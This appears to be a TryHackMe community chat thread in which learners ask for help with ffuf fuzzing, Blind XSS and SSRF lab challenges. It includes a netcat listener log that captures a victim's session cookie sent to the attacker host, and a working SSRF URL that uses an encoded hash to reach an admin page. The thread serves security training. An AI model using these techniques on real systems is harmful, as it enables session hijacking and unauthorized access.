As a POST request differs from a GET request in that the POST request here sends the data inside the body of the message, instead of defining parameters in the URL (like in GET, ie. .../signup?username=AAA&email=BBB...), you have to define what the data to be sent is.
The POST request arriving at the backend server in this case needs to contain information about the username, email address, password and cpassword in the request's body. That is why you define data with flag -d to be "username=FUZZ&email=x&password=x&cpassword=x". Technically, ffuf doesn't need to know where these values would have to be entered on the page, as ffuf sends the request directly to the backend's endpoint, where the browser would send the data to (defined earlier). ffuf here doesn't "emulate" browser-like actions such as getting the page, inputting values into it and then sending the data. Instead, ffuf only sends the data defined earlier with flag -d directly to the endpoint defined by you.
The part -H "Content-Type: application/x-www-form-urlencoded" is needed so that the data arrives to the backend in a desired form (type, "shape", NOT referring to a HTML form!), which the backend can understand.
Got it thanks, I am considering learning gobuster instead but as I have tried it I noticed it is a lot slower. Is it worth switching?
Gobuster surely is a tool useful for different types of enumeration (subdomain, DNS and directory / web content enumeration) which can also be done with ffuf. I haven't used gobuster a lot but what I quickly managed to find out about gobuster is that it is capable of at least enumerating users via "Basic Authentication" (where username:password data is sent as a base64 encoded string ("user:password" would be "dXNlcjpwYXNzd29yZAo=").
I do not know if Gobuster is capable of doing exactly what you were doing with ffuf: Fuzzing values in POST request data. It may be able to do that, but I couldn't quickly find information about that for sure, which left me to "doubt". However, Gobuster is worth trying and a good tool to have in your "toolbox". I personally usually have used Gobuster, though nowadays Feroxbuster, for web content enumeration. :)
PS: As for speed, I find ffuf a good, reliable and fast tool to be used for many things, which is why I'd keep it in the toolbox. Therefore I wouldn't recommend "switching" to Gobuster totally and leaving ffuf, since ffuf is capable of setting more precise filters on responses from what I know.
It wouldn't hurt using multiple tools as well just in case one of your tools missed something.
just wondering, what is the difference between doing DNS bruteforcing vs using ffuf?
don't the commands both just test a whole bunch of different subdomains via bruteforcing from a wordlist?
I think I get the fact that the ffuf one can be used for searching websites on private servers and hence a Host header needs to be added to emulate the hosted server. (please correct me if I'm wrong)
Apart from that, is the only difference that ffuf you can use a custom wordlist whereas dnsrecon just uses a pre-defined list of most common subdomains?
OWASP top10 room contains many missing screenshots! Can anyone from THM fix this please!?
Hey everyone, I'm currently on the Practical Example (Blind XSS) section and stuck in the last challenge. The objective is to get the staff-session cookie which I have gotten but it's not taking my answer. Anyone else running into this?
The session cookie comes in at a base64 and decoding it's value is supposed to be the answer but the room just won't accept my answer. Not sure what's going on
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.13.19.104] from (UNKNOWN) [10.13.19.104] 55362
GET /?cookie=c2Vzc2lvbj1kZmVlOGUwYzE1ZTEwMGE3ODdhMzI5NTA4NGMyZjM5OA== HTTP/1.1
Host: 10.13.19.104:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.26.218/
Origin: http://10.10.26.218
Connection: close
^C
┌──(SomeUser㉿KALI)-[~/THM/Learning]
└─$ echo "c2Vzc2lvbj1kZmVlOGUwYzE1ZTEwMGE3ODdhMzI5NTA4NGMyZjM5OA==" | base64 -d
session=dfee8e0c15e100a787a3295084c2f398
got it now. Turns out the wrong value is given when using a VPN terminal. I used the attackbox by THM and it gave me the right answer.
You probably set the payload wrong and captured your own cookie
Yea might have
Can anyone help me please? I am unable to see the images in the thm rooms !
Happened in owasp top 10 room and now in upload vulnerability room
Under section "walking an application", the link has been down for a few days. Could you please help to put it back? https://lab_web_url.p.thmlabs.com/
The link will change when you start the machine in task 1
hey, can someone explain to me, in the path "Burp Suite: The Basics" task 12, what am I supposed to find more or less?? ty
You'll only see requests coming from your selected target. For instance, you have a lot of tabs opened on your browser, if you do not set your scope, all requests will go through the Burp proxy as opposed to those coming from your target if you set it as your scope.
Can you check if you can access the web page of the image source? Something might be blocking it.
ty for your answer
Gave +1 Rep to @short wave
Hi everyone 🙂 I'm doing a OWASP Top 10 - 2021 room and am wondering if someone could provide some context for the following..
On task 22 - 10. Server-Side Request Forgery (SSRF) the part: "Going the Extra Mile: There's a way to use SSRF to gain access to the site's admin area. Can you find it? "
I've played around a lot and nothing worked.. Then I gave up and went to search online and found the solution is to add hash sign after url
So this is working: http://10.10.198.158:8087/download?id=75482342&server=localhost:8087/admin%23
But this isn't: http://10.10.198.158:8087/download?id=75482342&server=localhost:8087/admin
Could someone explain why? I don't really understand why this is the case..
The reason adding a hash sign after the URL in the SSRF payload works is that the hash sign is used as a client-side marker in a URL to indicate the position of a specific section within the web page. When a browser encounters a hash sign in a URL, it doesn't send that part of the URL to the server. Instead, it keeps it on the client-side and uses it to navigate to the specific section within the webpage.
so in this example the backend is appending stuff to the server parameter URL when calling it, so we break it with #?